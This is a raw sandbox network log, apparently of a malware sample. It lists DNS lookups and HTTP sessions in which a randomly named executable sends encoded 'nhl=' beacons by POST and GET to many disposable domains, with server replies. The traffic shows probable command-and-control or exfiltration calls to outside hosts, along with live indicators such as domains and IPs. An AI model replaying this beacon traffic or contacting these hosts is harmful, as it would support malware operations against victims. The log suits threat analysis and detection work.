Oct 9, 2024 13:02:57.782975912 CEST | 192.168.11.30 | 1.1.1.1 | 0x9439 | Standard query (0) | www.languyenthuyduyen.xyz | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:02:58.795376062 CEST | 192.168.11.30 | 9.9.9.9 | 0x9439 | Standard query (0) | www.languyenthuyduyen.xyz | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:02:59.810645103 CEST | 192.168.11.30 | 1.1.1.1 | 0x9439 | Standard query (0) | www.languyenthuyduyen.xyz | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:14.685317993 CEST | 192.168.11.30 | 1.1.1.1 | 0xa14c | Standard query (0) | www.bayarcepat19.click | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:27.932857037 CEST | 192.168.11.30 | 1.1.1.1 | 0xd11c | Standard query (0) | www.030002304.xyz | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:42.038948059 CEST | 192.168.11.30 | 1.1.1.1 | 0xfba4 | Standard query (0) | www.doggieradio.net | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:56.285307884 CEST | 192.168.11.30 | 1.1.1.1 | 0xb6e1 | Standard query (0) | www.mybartendinglife.club | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:09.532552958 CEST | 192.168.11.30 | 1.1.1.1 | 0x7761 | Standard query (0) | www.ntn.solar | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:22.763684988 CEST | 192.168.11.30 | 1.1.1.1 | 0xf1de | Standard query (0) | www.technew.shop | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:36.291852951 CEST | 192.168.11.30 | 1.1.1.1 | 0x1813 | Standard query (0) | www.allpop.xyz | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:49.929733992 CEST | 192.168.11.30 | 1.1.1.1 | 0xc8cd | Standard query (0) | www.zingara.life | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:03.286007881 CEST | 192.168.11.30 | 1.1.1.1 | 0x9ab5 | Standard query (0) | www.thepeatear.online | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:16.767235994 CEST | 192.168.11.30 | 1.1.1.1 | 0x73f6 | Standard query (0) | www.kx507981.shop | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:30.389271975 CEST | 192.168.11.30 | 1.1.1.1 | 0xde57 | Standard query (0) | www.teerra.shop | A (IP address) | IN (0x0001) | false
                                                                                                                                                                Oct 9, 2024 13:05:50.602797985 CEST192.168.11.301.1.1.10xebffStandard query (0)www.asociacia.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:06:04.803481102 CEST192.168.11.301.1.1.10x26f1Standard query (0)www.agilizeimob.appA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 9, 2024 13:01:39.074335098 CEST | 1.1.1.1 | 192.168.11.30 | 0x7e36 | No error (0) | www.sealofsea.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:01:39.074335098 CEST | 1.1.1.1 | 192.168.11.30 | 0x7e36 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:01:39.074335098 CEST | 1.1.1.1 | 192.168.11.30 | 0x7e36 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:02:44.623275042 CEST | 1.1.1.1 | 192.168.11.30 | 0x6a1a | No error (0) | www.firstcry.shop | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:02:44.623275042 CEST | 1.1.1.1 | 192.168.11.30 | 0x6a1a | No error (0) | www.firstcry.shop | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:00.226011992 CEST | 1.1.1.1 | 192.168.11.30 | 0x9439 | No error (0) | www.languyenthuyduyen.xyz | | 103.255.237.233 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:00.226078033 CEST | 1.1.1.1 | 192.168.11.30 | 0x9439 | No error (0) | www.languyenthuyduyen.xyz | | 103.255.237.233 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:14.801719904 CEST | 1.1.1.1 | 192.168.11.30 | 0xa14c | No error (0) | www.bayarcepat19.click | | 104.21.77.69 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:14.801719904 CEST | 1.1.1.1 | 192.168.11.30 | 0xa14c | No error (0) | www.bayarcepat19.click | | 172.67.205.38 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:28.369038105 CEST | 1.1.1.1 | 192.168.11.30 | 0xd11c | No error (0) | www.030002304.xyz | 030002304.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:03:28.369038105 CEST | 1.1.1.1 | 192.168.11.30 | 0xd11c | No error (0) | 030002304.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:42.247103930 CEST | 1.1.1.1 | 192.168.11.30 | 0xfba4 | No error (0) | www.doggieradio.net | doggieradio.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:03:42.247103930 CEST | 1.1.1.1 | 192.168.11.30 | 0xfba4 | No error (0) | doggieradio.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:42.247103930 CEST | 1.1.1.1 | 192.168.11.30 | 0xfba4 | No error (0) | doggieradio.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:56.387984037 CEST | 1.1.1.1 | 192.168.11.30 | 0xb6e1 | No error (0) | www.mybartendinglife.club | mybartendinglife.club | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:03:56.387984037 CEST | 1.1.1.1 | 192.168.11.30 | 0xb6e1 | No error (0) | mybartendinglife.club | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:03:56.387984037 CEST | 1.1.1.1 | 192.168.11.30 | 0xb6e1 | No error (0) | mybartendinglife.club | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:09.646835089 CEST | 1.1.1.1 | 192.168.11.30 | 0x7761 | No error (0) | www.ntn.solar | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:23.014664888 CEST | 1.1.1.1 | 192.168.11.30 | 0xf1de | No error (0) | www.technew.shop | technew.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:04:23.014664888 CEST | 1.1.1.1 | 192.168.11.30 | 0xf1de | No error (0) | technew.shop | | 45.56.219.238 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:36.462719917 CEST | 1.1.1.1 | 192.168.11.30 | 0x1813 | No error (0) | www.allpop.xyz | | 162.0.238.43 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:04:50.028239012 CEST | 1.1.1.1 | 192.168.11.30 | 0xc8cd | No error (0) | www.zingara.life | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:04:50.028239012 CEST | 1.1.1.1 | 192.168.11.30 | 0xc8cd | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:03.617819071 CEST | 1.1.1.1 | 192.168.11.30 | 0x9ab5 | No error (0) | www.thepeatear.online | thepeatear.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:05:03.617819071 CEST | 1.1.1.1 | 192.168.11.30 | 0x9ab5 | No error (0) | thepeatear.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:16.983318090 CEST | 1.1.1.1 | 192.168.11.30 | 0x73f6 | No error (0) | www.kx507981.shop | | 54.67.42.145 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:30.494545937 CEST | 1.1.1.1 | 192.168.11.30 | 0xde57 | No error (0) | www.teerra.shop | teerra.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:05:30.494545937 CEST | 1.1.1.1 | 192.168.11.30 | 0xde57 | No error (0) | teerra.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:30.494545937 CEST | 1.1.1.1 | 192.168.11.30 | 0xde57 | No error (0) | teerra.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:05:51.197057962 CEST | 1.1.1.1 | 192.168.11.30 | 0xebff | No error (0) | www.asociacia.online | asociacia.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:05:51.197057962 CEST | 1.1.1.1 | 192.168.11.30 | 0xebff | No error (0) | asociacia.online | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 13:06:05.138211966 CEST | 1.1.1.1 | 192.168.11.30 | 0x26f1 | No error (0) | www.agilizeimob.app | agilizeimob.app | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 13:06:05.138211966 CEST | 1.1.1.1 | 192.168.11.30 | 0x26f1 | No error (0) | agilizeimob.app | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49820 | 85.159.66.93 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:01:39.297161102 CEST | 347 | OUT | GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.sealofsea.xyz
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:02:39.509224892 CEST | 194 | IN | HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49821 | 13.248.169.48 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:02:44.738545895 CEST | 610 | OUT | POST /2mvq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.firstcry.shop
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.firstcry.shop
Referer: http://www.firstcry.shop/2mvq/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=4devIqXCoA5z0MN4HwUCqoNyQ6p/LTdlqsMwVDhzWZRz806Zkx53eunMl8/KMXYsIc8S8w5BvRk8dPEKx40w0AEBINYMW8qkMQMltS4u0sYwKyAkpMk7nxflcYjm56Dvii2CMJXhqKj/zxtrfZkrs/jfvgqOP97tgNQwhY27CecrFsx9M2GkJE6t6H3umaMNzw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.30 | 49822 | 13.248.169.48 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:02:47.381544113 CEST | 630 | OUT | POST /2mvq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.firstcry.shop
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.firstcry.shop
Referer: http://www.firstcry.shop/2mvq/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=4devIqXCoA5zycR4CT8CtINxMqp/SDdpqsAwVCk2Xq5z/RGZ20V3TOnM9M/PPnYRIcwa81ZBvRw8dNcKxPAz1QEPAtYObcqkMQMltTcE0sAwKCwk4Yw87BfqMIjmoqDrii28MLjHqIr/zwdrbd4oj/jVhAqAFYTnp8YMoYefEPdWNbAnR1ymakGAmGaGkYNWu1vb85r2ItD91OUNEg8eSQs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.30 | 49823 | 13.248.169.48 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:02:50.025144100 CEST | 1289 | OUT | POST /2mvq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.firstcry.shop
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.firstcry.shop
Referer: http://www.firstcry.shop/2mvq/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=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
Oct 9, 2024 13:02:50.025192976 CEST | 2458 | OUT | Data Raw: [hex dump omitted; decoded form follows]
Data Ascii: godD21qa1qgtA7cWKBjQN/WDfCjN6rnUsUfi+yzwHEYm0UK1rwXBMP8Ak37I2Vau9ZWbe5vyJmGlNi8eV+EwiwlKRI4ULdEiA2hqTCvNZZWhWm0Wv+j4UaZ5+2+KooaIj1muLEbJ+SbUq4eZvVrZu6clsJySsNMFnDgQfIH8PGJQUz9bY0rF1fn9V7uJgTrXPvlKSMoHyy3/KQD1Rj00xepcDCjyXel1xc6+ZNOseHD3LqxkSng


Session ID: 4 | Source: 192.168.11.30:49824 | Destination: 13.248.169.48:80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Oct 9, 2024 13:02:52.661657095 CEST | 347 bytes | OUT
GET /2mvq/?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.firstcry.shop
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:02:52.764462948 CEST | 399 bytes | IN
HTTP/1.1 200 OK
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:02:52 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 259
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 68 6c 3d 31 66 32 50 4c 66 62 4e 73 79 38 4d 33 49 39 34 57 78 6f 4a 6c 2b 39 4c 59 75 6c 47 4d 41 68 4c 36 62 59 51 43 53 67 75 65 37 73 55 35 69 71 4f 31 41 46 30 63 4f 50 62 30 64 43 33 49 30 6f 6c 65 75 45 53 74 41 4e 52 35 6e 6b 56 4e 49 38 77 67 6f 38 30 78 51 73 4a 4a 50 4d 42 56 35 4b 41 4d 30 31 7a 6c 58 4e 59 32 75 4d 52 55 46 34 48 37 35 55 67 68 54 67 3d 26 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P"}</script></head></html>


Session ID: 5 | Source: 192.168.11.30:49826 | Destination: 103.255.237.233:80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Oct 9, 2024 13:03:00.605992079 CEST | 634 bytes | OUT
POST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4e 34 47 67 64 32 73 2f 44 55 71 79 73 79 31 42 73 6d 33 58 47 2b 31 4c 2f 59 34 46 74 43 44 4f 44 32 56 59 2b 38 41 64 2b 30 39 43 6f 31 41 37 4f 34 63 6a 32 70 30 74 56 2f 76 41 64 7a 33 43 33 58 70 37 56 70 59 46 71 42 30 68 54 48 4f 30 64 6d 79 50 66 70 46 77 79 77 65 2b 56 6a 66 42 4b 64 65 59 54 6f 79 2f 50 4f 45 5a 76 63 5a 4c 76 4a 63 4c 2f 4a 36 59 63 64 7a 52 46 77 4b 51 54 4e 46 63 36 49 6b 75 2b 46 79 70 6b 6c 42 4a 4b 6c 31 38 43 49 37 31 31 67 6c 75 68 5a 66 42 6b 53 73 66 71 7a 47 63 62 46 50 6a 6f 32 7a 77 6d 2f 45 6c 78 51 3d 3d
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyN4Ggd2s/DUqysy1Bsm3XG+1L/Y4FtCDOD2VY+8Ad+09Co1A7O4cj2p0tV/vAdz3C3Xp7VpYFqB0hTHO0dmyPfpFwywe+VjfBKdeYToy/POEZvcZLvJcL/J6YcdzRFwKQTNFc6Iku+FypklBJKl18CI711gluhZfBkSsfqzGcbFPjo2zwm/ElxQ==
Oct 9, 2024 13:03:01.341492891 CEST | 634 bytes | OUT
POST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4e 34 47 67 64 32 73 2f 44 55 71 79 73 79 31 42 73 6d 33 58 47 2b 31 4c 2f 59 34 46 74 43 44 4f 44 32 56 59 2b 38 41 64 2b 30 39 43 6f 31 41 37 4f 34 63 6a 32 70 30 74 56 2f 76 41 64 7a 33 43 33 58 70 37 56 70 59 46 71 42 30 68 54 48 4f 30 64 6d 79 50 66 70 46 77 79 77 65 2b 56 6a 66 42 4b 64 65 59 54 6f 79 2f 50 4f 45 5a 76 63 5a 4c 76 4a 63 4c 2f 4a 36 59 63 64 7a 52 46 77 4b 51 54 4e 46 63 36 49 6b 75 2b 46 79 70 6b 6c 42 4a 4b 6c 31 38 43 49 37 31 31 67 6c 75 68 5a 66 42 6b 53 73 66 71 7a 47 63 62 46 50 6a 6f 32 7a 77 6d 2f 45 6c 78 51 3d 3d
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyN4Ggd2s/DUqysy1Bsm3XG+1L/Y4FtCDOD2VY+8Ad+09Co1A7O4cj2p0tV/vAdz3C3Xp7VpYFqB0hTHO0dmyPfpFwywe+VjfBKdeYToy/POEZvcZLvJcL/J6YcdzRFwKQTNFc6Iku+FypklBJKl18CI711gluhZfBkSsfqzGcbFPjo2zwm/ElxQ==
Oct 9, 2024 13:03:04.302586079 CEST | 959 bytes | IN
HTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:00 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID: 6 | Source: 192.168.11.30:49827 | Destination: 103.255.237.233:80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Oct 9, 2024 13:03:03.505832911 CEST | 654 bytes | OUT
POST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4d 59 32 67 4e 68 34 2f 46 30 71 7a 78 43 31 42 6d 47 33 4d 47 2b 35 4c 2f 64 4a 65 75 78 6e 4f 41 57 46 59 2f 35 73 64 39 30 39 43 6a 56 41 2b 41 59 63 53 32 70 34 6c 56 2f 54 41 64 7a 6a 43 33 56 68 37 56 36 77 47 72 52 30 5a 47 58 4f 32 5a 6d 79 50 66 70 46 77 79 78 37 62 56 67 76 42 4b 74 4f 59 53 4b 57 2b 46 75 45 61 2f 4d 5a 4c 72 4a 63 50 2f 4a 37 39 63 63 75 5a 46 79 69 51 54 4e 31 63 36 5a 6b 68 33 46 79 76 71 46 41 31 44 30 45 77 44 49 62 41 31 69 42 69 6b 71 65 37 68 46 64 46 33 77 79 65 49 6c 7a 4f 30 33 65 59 6b 39 46 2b 73 54 64 78 67 53 4e 64 58 6f 6c 73 42 72 48 42 61 35 5a 57 39 63 6f 3d
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyMY2gNh4/F0qzxC1BmG3MG+5L/dJeuxnOAWFY/5sd909CjVA+AYcS2p4lV/TAdzjC3Vh7V6wGrR0ZGXO2ZmyPfpFwyx7bVgvBKtOYSKW+FuEa/MZLrJcP/J79ccuZFyiQTN1c6Zkh3FyvqFA1D0EwDIbA1iBikqe7hFdF3wyeIlzO03eYk9F+sTdxgSNdXolsBrHBa5ZW9co=
Oct 9, 2024 13:03:03.872775078 CEST | 959 bytes | IN
HTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:03 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


